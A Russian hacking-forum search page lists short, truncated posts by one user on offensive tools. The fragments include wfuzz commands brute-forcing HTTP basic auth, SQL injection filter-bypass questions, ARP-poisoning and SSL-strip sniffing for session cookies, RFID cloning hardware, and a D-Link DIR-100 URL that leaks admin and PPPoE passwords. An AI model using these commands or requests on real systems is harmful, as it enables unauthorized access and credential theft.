Вернуться   RDot > Поиск по форуму

Показано с 1 по 11 из 11.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: VirusVFV
Раздел: Инструментарий/Tools 10.12.2014, 22:04
Ответов: 1
Просмотров: 5,277
Автор VirusVFV
Ищу аналог proxychains под Винду.

Задача - запустить WEB-сканер из винды через список прокси с распределением запросов по всему списку.
Например, 2 запроса через один прокси,2 через другой и т.д.
Ищется нечто вроде аналога...
Раздел: Инструментарий/Tools 10.12.2014, 21:59
Ответов: 5
Просмотров: 7,255
Автор VirusVFV
Юзай гидру для basic auth. При всех равных она...

Юзай гидру для basic auth.
При всех равных она побыстрее будет - всетаки С, а не питон...
Раздел: Инструментарий/Tools 10.12.2014, 21:57
Ответов: 5
Просмотров: 7,255
Автор VirusVFV
Странно.. ./wfuzz.py -c -t 50 -z...

Странно..

./wfuzz.py -c -t 50 -z file,wordlist/others/common_pass.txt -z file,wordlist/others/names.txt --basic FUZ2Z:FUZZ --hc 401 http://192.168.1.1...
Раздел: Инструментарий/Tools 08.12.2014, 21:17
Ответов: 5
Просмотров: 7,255
Автор VirusVFV
Как то так: wfuzz -c -t 50 -z...

Как то так:
wfuzz -c -t 50 -z file,/SecLists/Passwords/rockyou-75.txt -z file,/SecLists/Usernames/top.txt --basic FUZ2Z:FUZZ --hc 401,XXX http://site.com
в данном виде идет перебор по...
Раздел: Web-среда/Web-applications 24.02.2014, 13:59
Ответов: 3,618
Просмотров: 2,515,755
Автор VirusVFV
Есть union based SQL-инъекция. Но проблема в том,...

Есть union based SQL-инъекция. Но проблема в том, что перед отправкой запроса производится перевод параметра в верхний регистр.
Соответственно при указании таблицы - mysql.user преобразуется в...
Раздел: Web-среда/Web-applications 14.02.2014, 12:28
Ответов: 3,618
Просмотров: 2,515,755
Автор VirusVFV
Доброе время суток... Есть вопрос: в mysql...

Доброе время суток...
Есть вопрос: в mysql инъекции уязвимый параметр проходит через addslashes в php-скрипте. FILE привилегии есть, но вот записать файлы не получается, т.к. выходит нечто вроде...
Раздел: Сценарии/CMF/СMS 30.01.2014, 15:19
Ответов: 1
Просмотров: 9,667
Автор VirusVFV
Да, работает... Попадались сайты с такой дыркой. ...

Да, работает... Попадались сайты с такой дыркой.
Если не ошибаюсь - в 1.0.10 тоже есть...
Раздел: Целевые системы/Target systems 20.01.2014, 13:55
Ответов: 59
Просмотров: 56,109
Автор VirusVFV
Для сниффинга публичных сетей подходят проги на...

Для сниффинга публичных сетей подходят проги на андройде dsploit и intercepter-ng. работают через ARP-poisoning с применением SSL-strip'а и других вкусностей. к примеру с dsploit куки от контакта и...
Раздел: Инструментарий/Tools 13.01.2014, 12:11
Ответов: 11
Просмотров: 17,747
Автор VirusVFV
"ACR122U - ридер. Следовательно, нет." -...

"ACR122U - ридер. Следовательно, нет." - прикольно :)
На самом деле ACR122 читает и пишет без проблем. А основная ценность проксмарка (применительно к mifare) в том что он умеет снимать дамп трафика...
Раздел: Инструментарий/Tools 12.01.2014, 22:58
Ответов: 11
Просмотров: 17,747
Автор VirusVFV
много съел собак на RFID... По сути минимум -...

много съел собак на RFID...
По сути минимум - это ридер ACR122U (800руб.) - он и с виндой и в Backtrack'е без проблем работает.
Ну а для полного счастья с RFID конечно необходим Proxmark (брал...
Раздел: Web-среда/Web-applications 10.01.2014, 23:30
Ответов: 24
Просмотров: 40,631
Автор VirusVFV
Недавно нарыл вот такую штуку: DIR-100 HW Rev....

Недавно нарыл вот такую штуку:
DIR-100 HW Rev. D1 SW ver.4.03
http://X.X.X.X/cliget.cgi?cmd=$sys_user1%;$poe_user%;$poe_pass%;
в ответ:
user=admin&pass=xxxxxxx poeuser poepassword
...
Показано с 1 по 11 из 11.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot